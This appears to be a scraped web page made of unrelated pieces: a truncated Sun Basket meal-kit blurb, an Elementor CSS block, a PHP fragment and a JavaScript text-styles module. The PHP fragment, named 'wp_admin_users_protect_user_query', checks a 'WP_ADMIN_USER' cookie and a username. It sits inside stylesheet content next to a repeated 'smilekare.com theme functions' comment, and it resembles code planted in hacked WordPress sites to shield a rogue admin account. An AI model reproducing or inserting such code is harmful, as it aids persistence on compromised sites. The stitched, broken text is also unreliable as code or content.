With straightforward recipes and international alternatives, Sun Basket delivers a large choice of almost 30 foods each week. You are able to decide a [...]
/*! elementor - v3.16.0 - 17-10-2023 */ .elementor-edit-area-active .elementor-top-section > .elementor-container > .elementor-row { min-height: 40px; } .elementor-edit-area-active .elementor-inner-section > .elementor-container > .elementor-row { min-height: 40px; } .elementor-edit-area-active .elementor-column-wrap.elementor-element-empty .elementor-widget-wrap { min-height: 30px; } @media (min-width: 768px) { .elementor-edit-area-active .elementor-column-wrap.elementor-element-empty .elementor-widget-wrap { margin: 10px; } } .elementor-edit-area-active .handle { display: none; } /*# sourceMappingURL=editor-preview-legacy-rtl.css.map */ if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } /* smilekare.com theme functions */ /* smilekare.com theme functions */ import { tints, darkTints, text, lineHeight, fontWeight } from 'e-styles'; export default { base: { shared: ` color: var(--e-styles-text-color); font-size: var(--e-styles-text-font-size, ${ text.base }); font-weight: ${ fontWeight.normal }; line-height: var(--e-styles-text-line-height, ${ lineHeight.base }); `, variant: { xxs: ` --e-styles-text-font-size: ${ text.xxs }; --e-styles-text-line-height: ${ lineHeight.sm }; `, xs: `--e-styles-text-font-size: ${ text.xs };`, sm: `--e-styles-text-font-size: ${ text.sm };`, md: `--e-styles-text-font-size: ${ text.md };`, lg: `--e-styles-text-font-size: ${ text.lg };`, xl: `--e-styles-text-font-size: ${ text.xl };`, }, }, light: `--e-styles-text-color: ${ tints[ '800' ] };`, dark: `--e-styles-text-color: ${ darkTints[ '200' ] };`, };